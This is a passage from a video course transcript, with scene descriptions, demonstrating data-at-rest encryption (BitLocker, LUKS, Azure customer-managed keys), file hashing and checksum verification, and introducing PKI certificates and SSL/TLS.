Because they are encrypted with my current user account for an URL of course I can see exactly who that is
[Video description begins] He executes the following command: whoami. The output reads "ec2amaz-e5m0ctt\
administrator". The prompt does not change. [Video description ends]
In this video, find out how to protect data at rest using BitLocker.
Objectives
[Video description begins] Topic title: BitLocker Encryption. The presenter is Dan Lachance. [Video
description ends]
In some Windows client and server operating system editions, BitLocker is available to encrypt at the disk
volume level. Now it's designed to work in conjunction with TPM, or Trusted Platform Module hardware built
into the bios of your machine. But it doesn't have to, we can work without it as well. So to get started here,
Windows Server 2019. If I go to the start menu and type in bit, I have the Manage BitLocker option from the
Control panel. Now when I click on that, to launch it, I get nothing. The reason is because that component has
not been installed. It's possible. It's just not there. So I'm going to go into my Server Manager here and
Windows Server 2019.
[Video description begins] He selects an option called "Server Manager" under a section called “Windows
Server” in the Start menu and a window called "Server Manager" opens. [Video description ends]
[Video description begins] A wizard labeled "Add Roles and Features Wizard" opens. It is divided into two
parts. The first part includes some steps and the second part is a content pane. A step called "Before You
Begin" is selected in the first part and its corresponding page is open in the content pane. [Video description
ends]
Not because this is the only way to add that component, but I do want to add that component and I can do it
here in the GUI. and I'm going to go through and accept all the defaults for the current host.
[Video description begins] He clicks a button labeled "Next". The next step called "Installation Type" is
selected in the first part and its corresponding page is open in the content pane. He then clicks the Next
button. The next step called "Server Selection" is selected in the first part and its corresponding page is open
in the content pane. He then clicks the Next button. The next step called "Server Roles" is selected in the first
part and its corresponding page is open in the content pane. [Video description ends]
And I'm interested not in roles but rather in features and you'll see that BitLocker Drive Encryption is listed
here.
[Video description begins] He clicks the Next button. The next step called "Features" is selected in the first
part and its corresponding page is open in the content pane. The page includes a section labeled "Features",
which includes several options. [Video description ends]
So I'm going to click Add Features for the admin tools required to administer that as well.
[Video description begins] He selects an option labeled "BitLocker Drive Encryption" and its corresponding
dialog box opens. [Video description ends]
[Video description begins] The dialog box closes. An option labeled “Enhanced Storage” gets selected in the
Features section. [Video description ends]
I'm going to go ahead and click Next to install that Window Server 2019 feature.
[Video description begins] The next step called "Confirmation" is selected in the first part and its
corresponding page is open in the content pane. [Video description ends]
Here and I'm then told that a restart is pending on this Host.
[Video description begins] He clicks a button labeled "Install". The next step called "Results" is selected in the
first part and its corresponding page is open in the content pane. [Video description ends]
So I'm going to go ahead and close out and I'm going to restart it now.
[Video description begins] He clicks a button labeled "Close" and the wizard closes. He then closes the Server
Manager window. [Video description ends]
Okay, so now that I have rebooted BitLocker is available, it's an option. And so if I would go let say into a
command prompt, and start issuing commands like manage-bde BitLocker drive encryption-status. We'll get
just that status of what's going on.
[Video description begins] He opens a window called "Administrator: Command Prompt". The prompt "C:\
Users\Administrator>" is displayed. He executes the following command: manage-bde -status. The output
displays information of the D drive. [Video description ends]
So it says disk volumes that can be protected with BitLocker Drive Encryption drive D. So that's interesting.
We've got a second disk drive here that isn't yet encrypted, but we can enable BitLocker on it.
[Video description begins] He executes the following command: exit. No output returns and the window
closes. [Video description ends]
So I'm going to my start menu, and I'm going to type in bit and notice that the Manage BitLocker icon now is
not great open rather available, because the component is installed.
[Video description begins] He selects an option labeled "Manage BitLocker" and a window called "BitLocker
Drive Encryption" opens. [Video description ends]
[Video description begins] He points to a link called "Turn on BitLocker". [Video description ends]
[Video description begins] He clicks a link called "New Volume (D:) BitLocker off". [Video description ends]
And the same thing is true here for drive D. I can click on the link to expand it, and I have the option of turning
on BitLocker for drive D.
[Video description begins] He clicks the Turn on BitLocker link and its corresponding wizard opens. A page
called "Choose how you want to unlock this drive" is open in the wizard. [Video description ends]
It then asks me how would you like to unlock this drive use a password or a smart card.
[Video description begins] He points to checkboxes labeled "Use a password to unlock the drive" and "Use my
smart card to unlock the drive". [Video description ends]
Now I'm going to use a password, so I'm going to go ahead and enter and reenter the password. And then we'll
go ahead and click Next.
[Video description begins] He selects a checkbox labeled "Use a password to unlock the drive", and two text
boxes labeled "Enter your password" and "Reenter your password" appears below the checkbox. [Video
description ends]
Now it says how do you want to backup your recovery key now this is going to be important. If the password
is forgotten, we can print it or save it to a file.
[Video description begins] A page called "How do you want to back up your recovery key?" opens in the
wizard. [Video description ends]
[Video description begins] A dialog box labeled "Save BitLocker recovery key as" opens. [Video description
ends]
We're just going to store this on Drive C for now but of course that's useless if the whole machine is encrypted
or there's a problem accessing the contents of the drives. So it really should be backed up somewhere safe.
Now, it says you can't save it in root directory of a non-removable drive.
[Video description begins] He clicks a button labeled "Save" and an error message appears. [Video
description ends]
So it's got a built-in checker to make sure that we are saving this in the proper location.
[Video description begins] He clicks a button labeled "OK" and the error message closes. He then closes the
dialog box. [Video description ends]
So in this case, I'm going to choose Print the recovery key. We'll print to PDF. I'll store this, let's say on drive
D.
[Video description begins] The corresponding dialog box opens. He clicks a button labeled "Print". The File
Explorer window opens. [Video description ends]
I'll call it a Key. So I'll go ahead and click Save. And now we can go ahead and click Next.
[Video description begins] In the wizard, a page called "Choose how much of your drive to encrypt"
opens. [Video description ends]
So at this point, it says, how much of your drive do you want to encrypt? Used disk space only or the entire
drive? Well, technically, there's nothing that's on that drive yet. It's a brand new disk volume that's been added
to this host. So I'm going to use the encrypt used disk space only, as it recommends that it's faster and best
New PCs and new drives fine, no problem.
[Video description begins] A page called "Choose which encryption mode to use" opens. [Video description
ends]
Next, I'm going to leave it in compatibility mode for the encryption mode to use.
[Video description begins] He clicks the Next button. A page called "Are you ready to encrypt this device?"
opens. [Video description ends]
So now depending on how big the drive is and what's on it, how much data and which option we would like to
use for encryption will determine how long it takes. But we can see that it looks like it's happened already. We
no longer have the option to Turn on BitLocker to protect data at rest on drive D. But instead we have options
such as backing up the recovery key, changing the password, adding a smart card, or even turning off
BitLocker. So if we were to go back to the command prompt, let's do that again, CMD. And let's issue the
command we were issuing in here previously which was manage-bde-status.
[Video description begins] He opens the Administrator: Command Prompt window. The prompt "C:\Users\
Administrator>" is displayed. [Video description ends]
We can now see that the Conversion Status that used space only is encrypted and that we're using AES 128 bit
encryption.
[Video description begins] He executes the following command: manage-bde -status. The output displays
information of the D drive. [Video description ends]
Protection is now on. But of course when the machine is up and running, the encryption is not enabled. In other
words, it's Unlocked.
[Video description begins] He points to the text, "Lock Status: Unlocked". [Video description ends]
So if you had a malware infection on this host BitLocker doesn't really help with anything. Because once the
machine is up and running in that volume is unlocked. It's as if it's not even encrypted. So the protection here is
at the disk or volume level. So if someone were to steal the disk out of the machine, I had no power and try to
put it on their machine. They wouldn't be able to access it.
During this video, you will learn how to protect data at rest on a Linux system.
Objectives
[Video description begins] Topic title: Linux Filesystem Encryption. The presenter is Dan Lachance. [Video
description ends]
The protection of data at rest, in other words, data confidentiality normally through encryption is sometimes
mandated for regulatory compliance. And there are many ways that this can be done in Linux.
[Video description begins] A command prompt window called "dlachance@kali: ~" is open. The prompt
"root@kali:~#" is displayed. [Video description ends]
So let's start here in Linux by running fdisk -l to list devices.
[Video description begins] He executes the following command: fdisk -l. The output displays a list of devices
and their information. The prompt does not change. [Video description ends]
So the first device is /dev/sda, and it's been carved up into a number of partitions. We can see that with the
numbers after the reference to /dev/sda.
[Video description begins] In the output, he points to "/dev/sda1", "/dev/sda2", and "/dev/sda5". [Video
description ends]
We've also got a device here called /dev/sdb. This one we're going to enable encryption for. So this is an entire
disk device that we're going to carve up into one volume and it's going to be encrypted. So what I want to do
then is first make sure I have the appropriate tools installed to make this happen.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
So depending on your distribution of Linux will determine how you check for the most up to date version of
the package. Here in Kali Linux, I'm going to run apt-get, and I'm going to tell him what to install, something
called cryptsetup. Now, if I've already got it, it'll tell me it's already there.
[Video description begins] He executes the following command: apt-get install cryptsetup. The output displays
that the cryptsetup package is installed with the newest version. [Video description ends]
And in this case, it's telling me you already have the newest version. Well, that's good news. I want to make
sure, I have the most up to date software for this to work. So the next thing I'm going to do is run cryptsetup.
And I'm going to tell it I want to use the luksFormat, notice capital F there. Luks, L-U-K-S, stands for Linux
Unified Key Setup. It's a style of encryption for Linux storage devices. The -y means I want to prompt for a
passphrase and -v is for verbose. Now I have to also tell it the device I want this applied against. So the last
parameter is going to be /dev/sdb as per our fdisk -l command output.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. He then executes the following command: cryptsetup -y -v luksFormat /dev/sdb. The output displays a
warning, which reads “This will overwrite data on /dev/sdb irrevocably" and the window prompts "Are you
sure? (Type uppercase yes):". [Video description ends]
Are you sure? Type uppercase yes, okay, I'll type in uppercase YES.
[Video description begins] The window prompts "Enter passphrase for /dev/sdb:". [Video description ends]
[Video description begins] A text displays, which reads "Key slot 0 created". The prompt "root@kali:~#" is
displayed. [Video description ends]
Okay, next thing I'm going to do is run cryptsetup again and I'm going to specify luksOpen, that's the type of
encryption scheme I'm interested in, or tool. I'm going to specify /dev/sdb. And I'm going to make a reference
here to an encrypted volume that I'm calling archive one, it could be called anything I want it to be called.
[Video description begins] He executes the following command: cryptsetup luksOpen /dev/sdb archive1. The
window prompts "Enter passphrase for /dev/sdb:". [Video description ends]
So of course, it prompts me for the passphrase that was entered earlier. So I'm going to go ahead and enter that.
[Video description begins] The prompt "root@kali:~#" is displayed. [Video description ends]
All right, let's see what's going on here. So I'm going to type cryptsetup -v for verbose,= status, in this case, I
want the status of archive1, okay.
[Video description begins] He executes the following command: cryptsetup -v status archive1. The output
displays the status of archive1 and its information. [Video description ends]
So it's a LUKS2 type of encrypted volume, aes plain64, 512 bits is the key size, device is /dev/sdb, okay. this
looks good.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
Now the next thing we have to do is make a file system on it because right now, it can't even be mounted and
files can't be placed on that disk location. So I'm going to run standard Linux commands to do that, mkfs so
make file System .ext4. And I've got to specify dev/mapper now because I've given this volume a name
archive1, and let's just go ahead and do that. Okay, that was pretty quick and easy. It is a small disk volume,
mind you.
[Video description begins] He executes the following command: mkfs.ext4 /dev/mapper/archive1. The output
displays the creation of a filesystem. [Video description ends]
Let's make a mount point directory on the root here. Why don't we call it the same thing, archive1, doesn't have
to be called the same thing. It's just a Linux thing, but I will do that.
[Video description begins] He executes the following command: mkdir /archive1. No output returns and the
prompt does not change. [Video description ends]
And the next thing we want to do is mount that so it's usable. So when I say mount that, I'm talking about
mounting our crypted volume, /dev/mapper/archive1. And we happen to have a folder, a mount point folder on
the root, with the same name. It doesn't have to be the same thing, but that's what I've called it here.
[Video description begins] He executes the following command: mount /dev/mapper/archive1 /archive1. No
output returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: mount. The output displays information about
the mounted filesystem in the directory structure. [Video description ends]
If I type mount, then we can see here that it is available under /archive.
[Video description begins] In the output, he points to the text "/dev/mapper/archive1 on /archive1 type ext4
(rw,relatime)". [Video description ends]
So what that means is if we change directory to /archive, we can just work with the file system here as we
normally would.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
And place files here, remove files, rename files, organize them in folders, anything we would normally do.
[Video description begins] He executes the following command: cd /archive1. No output returns and the
prompt changes to "root@kali:/archive1#". He then executes the following command: ls -l. The output
displays that there are 16 files and subdirectories in the current directory. [Video description ends]
So it is working. And as per any file system in a Linux environment, you can also unmount it with the umount
command, umount let's say /archive1.
[Video description begins] He executes the following command: umount /archive1. The output reads "umount:
/archive1: target is busy". The prompt does not change. [Video description ends]
Now of course it says it's busy because I'm in there. That's my mistake. Let's get out of here by cd back to the
root.
[Video description begins] He executes the following command: cd /. No output returns and the prompt
changes to "root@kali:/#". [Video description ends]
[Video description begins] He executes the following command: umount /archive1. [Video description ends]
[Video description begins] He executes the following command: mount. The output displays information about
the filesystem in the directory structure. [Video description ends]
And if we type mount, well, we don't see that mount point listed down at the bottom any longer.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
Now I can also run cryptsetup. And I can also close up that encrypted volume so it's not used so luksClose and
I can tell it archive1.
[Video description begins] He executes the following command: cryptsetup luksClose archive1. No output
returns and the prompt does not change. [Video description ends]
I can also open it of course, so cryptsetup so that I can, essentially opening it up means I want to be able to see
what's there. I want access to that data. I don't want it to be locked up and encrypted anymore. So I can run
cryptsetup luksOpen, so in this case /dev/sdb and then archive1.
[Video description begins] He executes the following command: cryptsetup luksOpen /dev/sdb archive1. The
window prompts "Enter passphrase for /dev/sdb:". [Video description ends]
Of course, it wants to pass phrase. Now, I don't need it to close up and then basically lock up and encrypt that
disk volume but to open it, I do need a passphrase. I'm going to go ahead and put that in and we are good to go.
[Video description begins] The prompt "root@kali:/#" is displayed. [Video description ends]
So we're looking here at how to manually work with an encrypted disk volume in Linux. To set persistent
mounts that would automatically mount that luks encrypted volume upon reboot, then you could make changes
to the /etc/crypttab file.
[Video description begins] He executes the following command: ls /etc/crypttab. The output reads
"/etc/crypttab". The prompt does not change. [Video description ends]
So by doing that, you can have it mount automatically. Now bear in mind that what we're talking about here is
encryption that will protect the data at rest when the machine is off. When the machine is on, it's as if luks
encryption isn't even there. So standard hardening techniques and best practices should always be adhered to
while the machine is functional. And of course, don't lose the passphrase. Otherwise, all your encrypted data is
irretrievable when you need to remount that encrypted luks container again.
Find out how to configure custom encryption keys for cloud storage.
Objectives
[Video description begins] Topic title: Cloud Storage Encryption. The presenter is Dan Lachance. [Video
description ends]
Protection of data at rest, in other words, encrypting data, also applies in the cloud. Most public cloud
providers will give cloud tenants, or customers, the option of using managed keys that are created by the
provider to encrypt cloud storage, or, to use customer controlled keys, which is what we're going to do. So,
here, we're going to do this on the Microsoft Azure public cloud computing platform.
[Video description begins] A web page called "All resources - Microsoft Azure" is open. [Video description
ends]
To get started, I need to create a resource. So I'm going to click in the upper left, here, on the Azure portal web
page.
[Video description begins] He opens the portal menu, which includes several menu options. [Video description
ends]
I've already got an Azure account. I've already signed into this management tool. I'm going to click Create a
resource. The first thing I need to create is a Key Vault.
[Video description begins] A blade labeled "New" opens. It includes a search bar. [Video description ends]
[Video description begins] He types the text, "key vault" in the search bar and selects the search option
labeled "Key Vault". The corresponding blade opens. [Video description ends]
I'm going to be creating a key that will be used to encrypt cloud-stored data. So I'm going to Create the Key
Vault. There are a few things I'll have to fill in, nothing too major.
[Video description begins] He clicks a button labeled "Create" and its corresponding blade opens. A tab
labeled “Basics” is selected in the blade. [Video description ends]
So you don't need to be an expert in Azure for this to happen. So a Resource group is simply a way to organize
related cloud resources so they can be managed or deployed as a group.
[Video description begins] He clicks a drop-down list box labeled "Resource group", and a drop-down list
opens, which includes an option labeled "RG1". He then selects the option. [Video description ends]
So I already have a Resource group called RG1. I'm going to tie this Key Vault to that Resource group. I'm
going to call the Key Vault something that is in line with the naming rules within my organization.
[Video description begins] He enters the text, "kv45560yhz" in a text box labeled "Key vault name". [Video
description ends]
I'm going to specify a physical location, or region, here. Let's see, well, we have all kinds of options.
[Video description begins] He clicks a drop-down list box labeled “Region”, and a list opens. [Video
description ends]
Why don't we put this in East US? Now I can specify Retention period values and so on. However, at this
point, I'm okay with this. I'm just going to click the Review + create button. The validation pass, so I filled in
what I need to fill in. I'm going to go ahead and click Create to create the Key Vault.
[Video description begins] A page called “Overview” opens in a blade called “kv45560yhz”. It includes the
text, "Your deployment is underway". [Video description ends]
Now, we're creating this Key Vault in the cloud, after which I'm going to navigate to it and create a key within
the vault.
[Video description begins] The text changes to "Your deployment is complete". [Video description ends]
Once the Key Vault deployment is complete, I'll click the link or the button that says, Go to resource.
[Video description begins] The kv45560yhz blade opens. [Video description ends]
And within there, I'll click Keys, on the left, and I want to generate a key.
[Video description begins] The Keys page opens in the blade. He clicks a button labeled "Generate/Import"
and its corresponding blade opens. [Video description ends]
Notice I could also choose to import a key or restore from backup if I already had one.
[Video description begins] He clicks a drop-down list box labeled "Options" and a drop-down list opens,
which includes an option labeled "Generate". He then selects the Generate option. [Video description ends]
I'm going to call this Key1. It's going to be an RSA 2048-bit key. I'm not going to set an activation or
expiration date, so it could be used now and it's Enabled, and I'll click Create.
[Video description begins] The blade closes. A key called “Key1” appears in the Keys page with the status
“Enabled”. [Video description ends]
So that takes care of the key in the Key Vault. Next thing I'm going to do is clicking the upper left here and
create another resource, I'm going to search for a storage account.
[Video description begins] He opens the portal menu and selects an option labeled "Create a resource". The
New blade opens. [Video description ends]
And I'm going to basically create a new Storage account here in the Microsoft Azure cloud.
[Video description begins] He selects the search option labeled "Storage account - blob, file, table, queue"
and its corresponding blade opens, which includes a button labeled "Create". He then clicks the Create button
and its corresponding blade opens. In the blade, the Basics tab is open. [Video description ends]
So put it in the Resource group RG1. I'll call it sa, for storage account. And again, I'll follow the nomenclature
rules for my organization.
[Video description begins] He enters the text, "sa44563yhz" in the Storage account name text box. [Video
description ends]
It's going to be in East US, and really, I'm not going to change any other details about the account. I will click
Review + create, and then I'll Create the storage account. Because what I want do, is once that's successfully
deployed, is go into the properties of the storage account and take a look at the encryption.
[Video description begins] The Overview page of the Microsoft storage account opens. [Video description
ends]
Now what should happen is it should automatically be encrypted using Microsoft Azure-managed keys. Well,
for regulatory compliance, in some cases, or even just security standards compliance outside of laws and
regulations, your organization might need to control the keys that encrypt cloud-stored data. And so it's a good
option to have.
[Video description begins] A blade labeled "sa44563yhz" opens. [Video description ends]
All right, let's click Go to resource, to go to the storage account, and I'm going to click on Encryption on the
left.
[Video description begins] A page called "Encryption" opens. [Video description ends]
And again, it's currently set by default to Microsoft Managed Keys, and that's what we want to change.
[Video description begins] He selects a radio button labeled "Select from Key Vault" and a link labeled
"Select a KeyVault and Key for encryption" appears. [Video description ends]
So I'm going to click Customer Managed Keys, and I'm going to scroll down, going to select from a vault, so
I'll select a Key Vault.
[Video description begins] He clicks the link and its corresponding blade opens. [Video description ends]
And that Key Vault will be the one that we just created a few moments ago here.
[Video description begins] In the blade, he clicks a drop-down list box labeled "Key vault" and a drop-down
list opens, which includes an option labeled "kv45560yhz". He then selects the option. [Video description ends]
And I'll select a key, Key1, and the version of the key.
[Video description begins] He clicks a drop-down list box labeled "Key" and a drop-down list opens, which
contains an option labeled "Key1". He then selects the option. [Video description ends]
We've only got one single current version of the key, and I'll choose Select.
So now it's filled in the Key Vault name and the key that will be used to encrypt this data in this storage
account. Of course, there's no data yet because it's just been created, but I'm going to go ahead and click Save,
to put that into effect. Now, it says that new data will be encrypted, any old data will be retroactively encrypted
using a background process. So you don't have to worry about data that might already have been there. So in
this way, we have a key that is under our control as a cloud tenant to manage protection of data at rest in the
Microsoft Azure cloud.
recognize the importance of hashing for file systems and network communications
[Video description begins] Topic title: Hashing. The presenter is Dan Lachance. [Video description ends]
Hashing is a function of cryptography, it can be used for file integrity, where we can detect unauthorized
tampering of files. Hashing generates a unique value that represents the state of that file at that point in time. If
anything in that file changes when we run a hash of the file again, that unique value will be different. And so
we know because it's different, the file itself is different. So that's how it can be used to detect unauthorized
tampering. So you'll see hashing at the file system level often used with Digital Forensic Analysis to ensure
that collected evidence of a digital nature on storage media is admissible in a court of law. Because we want to
make sure that nothing has been tampered with by third parties or by law enforcement and so on, since the
evidence was gathered. Often, hashing will occur these days using SHA-256 as the hashing algorithm, 256
bits. Where SHA stands for secure hashing algorithm. But that's as opposed to using the older and much less
secure MD5 hashing algorithm, message-digest version 5.
So the hashing process begins with feeding raw data bits into a one way hashing algorithm. Now the result of
that is the hash or what is also sometimes called a message digest. The terms are synonymous. Now the future
hashes of that same data will be different if the source data has been modified, as we discussed with hashing.
Digital signatures take it a step further, such as when you digitally sign an email message. It uses hashing, so
that the message content uses a hash algorithm that results in a hash value or message-digest. So that is a
unique item that represents the contents of that message. And that's the integrity part of this. The hash value is
then encrypted with the sender's private key. So we're talking about a user in this case, having a public and
private key pair. So they have the private key in their possession and it can be used to essentially create a
digital signature that gets verified by others that receive the message with a related public key. This is all about
message authenticity at this point. So with the public key on the other end, essentially the recipient can go
through the same type of calculation, so that they can verify that, that is a unique hash and that the message
came from who it says it came from.
[Video description begins] Topic title: Windows File Hash Generation. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'm going to use PowerShell to generate file hashes. File hashes, of course, are used to
verify whether or not a change has occurred in a file by comparing a current hash to a past hash. If the hash
values are the same, the file hasn't changed.
[Video description begins] A window called "Administrator: Windows PowerShell" opens. The prompt "PS C:\
Users\Administrators>" is displayed. [Video description ends]
But if they're different, a change has occurred. and I'm going to go to drive D where I know I've got a budgets
folder.
[Video description begins] He executes the following command: d:. No output returns and the prompt changes
to "PS D:\>". The prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cd .\Budgets\. No output returns and the
prompt changes to "PS D:\Budgets>". The prompt does not change. [Video description ends]
Here in my Windows Server 2019 environment, I'm going to fire up PowerShell. And I know I've got a couple
of files here.
[Video description begins] He executes the following command: cls. No output returns and the screen clears.
The prompt does not change. He then executes the following command: dir. The output displays all the files
contained in the Budgets folder. [Video description ends]
Now, the first thing I'm going to do here is generate a file hash, unique hash, for each of these files. So I can do
that with get-filehash. I could specify a specific file name, but here, I'll put *.*, every file with every extension
in the current directory. When I do that, I can see the unique hash values, they're SHA256 by default.
[Video description begins] He executes the following command: get-filehash *.*. The output displays hash
values and algorithms for all the files contained in the Budgets folder. [Video description ends]
And I can see that they are tied, of course, to the individual file names.
[Video description begins] In the output, he highlights the hash value for a file "Budget1.txt" and then points
to its corresponding algorithm, which is SHA256. [Video description ends]
Now we're going to make a change, let's say to the file Budget1.txt.
[Video description begins] In the output, he highlights the hash value for a file "Budget2.txt". [Video
description ends]
Now we can see it's got a specific hash value, and we'll just keep that on screen.
[Video description begins] In the output, he highlights "Budget1.txt" and then highlights its corresponding
hash value. [Video description ends]
Now if you're really going to be using this, you're going to want to perhaps redirect the output of the get-
filehash command to a storage file somewhere. So you have a record of this, maybe using the output
redirection symbol, the greater than sign. At any rate here, what I'm going to do is use Notepad and I'm going
to open up the Budget1.txt file, and I'm going to make a change.
[Video description begins] He executes the following command: notepad .\Budget1.txt. No output returns and
the prompt does not change. A file called "Budget1 - Notepad" opens, which includes the text "Sample
Data". [Video description ends]
Change, there you go. And I'm going to close and save the file, of course.
[Video description begins] In the file, he enters the text "Change" and clicks a button labeled "Close". A pop-
up opens, which includes a button labeled "Save". He clicks the button and the file closes. [Video description
ends]
So now what I want to do is I actually want to run get-filehash but only against, let's say that single file, and I
only want to check the hash on Budget1. So I'm going to go ahead and do that.
[Video description begins] He executes the following command: get-filehash .\Budget1.txt. The output displays
the hash value and algorithm for the Budget1.txt file. [Video description ends]
Now immediately, we can see the previous hash of Budget1 listed above is not the same as the current hash
taken listed down below.
[Video description begins] In the output of the command "get-filehash *.*", he highlight the hash value for the
Budget.txt file and then, in the output of the command "get-filehash .\Budget1.txt", he highlights the hash value
for the Budget.txt file. [Video description ends]
And of course, that's because we changed the contents of the file. We know that a change has occurred. Now to
track details about changes, where the change was made from, who did it, and so on, we should enable file
system auditing. But at this level, get-filehash in PowerShell will at least alert us to the fact that a change has
occurred.
[Video description begins] Topic title: Linux File Hash Generation. The presenter is Dan Lachance. [Video
description ends]
Hashing is a cryptographic function that essentially takes data, feeds it through a one way algorithm. You don't
need a key, it's not encryption. And that results in a unique hash, otherwise called a message digest. Now why
do we need this? We need this because it allows us to identify changes in the future when we run that hashing
algorithm again. And this is a big deal when it comes to digital forensics and the admissibility of evidence to
ensure it's not been tampered with. So there are many ways to do that.
[Video description begins] A window called "dlachance@kali: ~" opens. The prompt "root@kali:/#" is
displayed. [Video description ends]
Here in Linux, I'm going to do it for SHA-256. SHA stands for Secure Hashing Algorithm, SHA. So to get
started here, let's go ahead and create a file. I'm going to call this testfile.txt.
[Video description begins] He executes the following command: touch testfile.txt. No output returns and the
prompt does not change. [Video description ends]
And what I want to do is immediately generate a hash of that file, even though there's nothing in it. The touch
command simply creates a zero byte file. So to do this, I'm going to run sha256sum, that's built in Linux
command, and I'm going to run it against testfile.txt.
[Video description begins] He executes the following command: sha256sum testfile.txt. The output displays the
hash value for a file called "testfile.txt". The prompt does not change. [Video description ends]
Now here we see on the screen, the unique hash value. Now of course, you could write that out to a file, which
I'm going to do, I'm going to use the up arrow key to bring up that previous command. And I'm going to use
the append output redirection symbol, two greater than signs. And let's say we're going to create a file here
called hashes.txt.
[Video description begins] He executes the following command: sha256sum testfile.txt >> hashes.txt. No
output returns and the prompt does not change. [Video description ends]
Now once that's done, I can use the cat command to view the contents of hashes.txt, now it's stored in a file.
[Video description begins] He executes the following command: cat hashes.txt. The output displays the
contents of a file called "hashes.txt". The prompt does not change. [Video description ends]
We're not reliant on what's on the screen. So what I'm going to do now is make a change to testfile.txt. I'm
going to echo "Hello world" to the file. So I'll use the echo command, put my text in quotes, single greater than
sign output redirection and I want that going into testfile.txt. We're going to cat testfile.txt.
[Video description begins] He executes the following command: echo "Hello world" > testfile.txt. No output
returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cat testfile.txt. The output reads "Hello
world". The prompt does not change. [Video description ends]
So let's use the up arrow key, and let's go back to our sha256sum command, where we are looking at
generating a hash. For testfile.txt, we're going to append the result to hashes.txt.
[Video description begins] He executes the following command: sha256sum testfile.txt >> hashes.txt. No
output returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cat hashes.txt. The output displays the
contents of a file called "hashes.txt". The prompt does not change. [Video description ends]
Same file, different hashes, because the file has changed. And therein lies the purpose of generating hashes in
file system objects.
In this video, you will download and verify the checksum for Kali Linux.
Objectives
[Video description begins] Topic title: Internet Download Hash Comparison. The presenter is Dan
Lachance. [Video description ends]
Hashing is used in cryptography to detect changes, whether it's a network message that might have changed
from when it was sent to when it was received over the network. Versus a file that might have been
downloaded over the Internet. So hashing doesn't have to be used for security purposes like with digital
forensics and evidence admissibility.
[Video description begins] A web page called "Official Kali Linux Downloads" is open. [Video description
ends]
In this example, I've gone to the Kali Linux Download page, where I have a number of download images that
can be brought down over the Internet to a user's machine.
[Video description begins] He scrolls through the page. The page includes a table. [Video description ends]
[Video description begins] He points to a row entry labeled "Kali Linux 64-Bit (Live)" under a column header
labeled "Image Name". [Video description ends]
[Video description begins] He points to a column header labeled "SHA256Sum". [Video description ends]
Where SHA S-H-A stands for secure hashing algorithm. The purpose of this being posted on a website is so
that people that download this can run the hash value again, essentially run the hashing algorithm against the
downloaded file to result in the value to make sure it's the same.
[Video description begins] He highlights a row entry under the SHA256Sum column header, adjacent to the
Kali Linux 64-Bit (Live) row entry. [Video description ends]
And if it's the same, it means it hasn't been corrupted. So let's go ahead and do this. So we're going to focus on
the Kali Linux 64-Bit (Live) file that I've downloaded, we're going to make sure that the SHA256Sum, well, is
the same as this.
[Video description begins] He points to the row entry under the SHA256Sum column header, adjacent to the
Kali Linux 64-Bit (Live) row entry. [Video description ends]
[Video description begins] He opens a window called "Windows PowerShell". The prompt "PS D:\>" is
displayed with the following command: get-filehash .\kali-linux-2020.1-live-amd64.iso. [Video description
ends]
So to generate a hash locally on my Windows computer, I can go into PowerShell and call upon the get-
filehash cmdlet. On the root of drive D is where I've downloaded that file. So, I'm going to go ahead and press
enter, but just bear in mind that the larger the file, the larger it'll take to generate the hash. The default
algorithm used here for hashing with get-filehash unless specified otherwise in the command line is SHA256.
[Video description begins] In the output, he highlights the hash value. [Video description ends]
The hash starts with ACF455. And sure enough ends with 79152.
[Video description begins] He switches to the Official Kali Linux Downloads web page and points to the row
entry under the SHA256Sum column header, adjacent to the Kali Linux 64-Bit (Live) row entry. [Video
description ends]
So back here on the Kali site, we can see indeed that the SHA256 hash value is the same. So we know that
what we've downloaded hasn't been changed in any way, such as through corruption, while downloading that
file.
In this video, you will identify the steps in the PKI certificate lifecycle.
Objectives
[Video description begins] Topic title: Certificate Lifecycle. The presenter is Dan Lachance. [Video
description ends]
Public Key Infrastructure, or PKI, is a system, or more specifically, a hierarchy of digital security certificates.
And these are used to secure technology in some way. So, for example, if the need is for email confidentiality,
then the solution that PKI would offer would be to encrypt the message with the recipient's public key. If we
need email authenticity and integrity, the solution would be to generate a message hash of the message and
encrypt that hash with the sender's private key. It would get verified on recipient's end with the related public
key. The need is to secure network communication to a web server. The solution could be to use a PKI
certificate, along with the TLS version 1.2 or higher protocol, to enable HTTPS for that web server site. If we
need multifactor authentication to a VPN, maybe the solution includes having smart cards issued to users with
embedded private keys. If the need is a single card for facility and computer access, maybe the solution would
be to issue common access cards with embedded private keys. So that single card could be used to gain access
to a facility, and the same card can also be used to access computer systems. Now, a lot of this would be
automated and transparent to the user, such as encrypting and digitally signing messages. The user, at the most,
might have to click a button to do these things, that's about it.
[Video description begins] PKI Lifecycle. [Video description ends]
Now, PKI certificates have a lifecycle, they are issued from a certificate authority. And depending upon the
certificate authority or template configurations, will determine how long the certificate is good for. And also,
the certificate template will also determine how the certificate can be used. Can it only be used to send
digitally signed email messages? Can t be used for mail encryption? Maybe only encryption of file system
items? Now, finally, before the certificate expires, it can be renewed. An expired certificate is no longer valid,
and therefore can no longer be used. But if you want to maintain the same usage of the certificate over time, it
can be renewed. Much like you would renew a passport or a drivers licence as opposed to letting it expire and
going through the entire process again. Certificates can also be revoked, that's another possible item in the
lifecycle. A revoked certificate is done at the CA level, where the serial number of the certificate, depending
on the specific protocol being used, is added to a list. And that list is checked when services are being used to
determine whether or not we've got someone trying to connect with a revoked PKI certificate.
After completing this video, you will be able to recognize how SSL and TLS are used to secure network
traffic.
Objectives
recognize how SSL and TLS are used to secure network traffic
[Video description begins] Topic title: SSL and TLS. The presenter is Dan Lachance. [Video description ends]
SSL and TLS are network security protocols. SSL stands for Secure Sockets Layer. This was a Netscape
protocol in the 1990s to secure connectivity to applications like websites. TLS is the Transport Layer Security
network protocol, and it supersedes SSL. Now both SSL and TLS require PKI certificates. So let's say you
want a secure connectivity to a web application. So instead of HTTP, you want HTTPS connections, normally
over port 443. You need a PKI certificate to do that. To call it an SSL certificate is technically not correct
because it's a PKI certificate. And that same certificate could be used for either SSL or TLS depending on
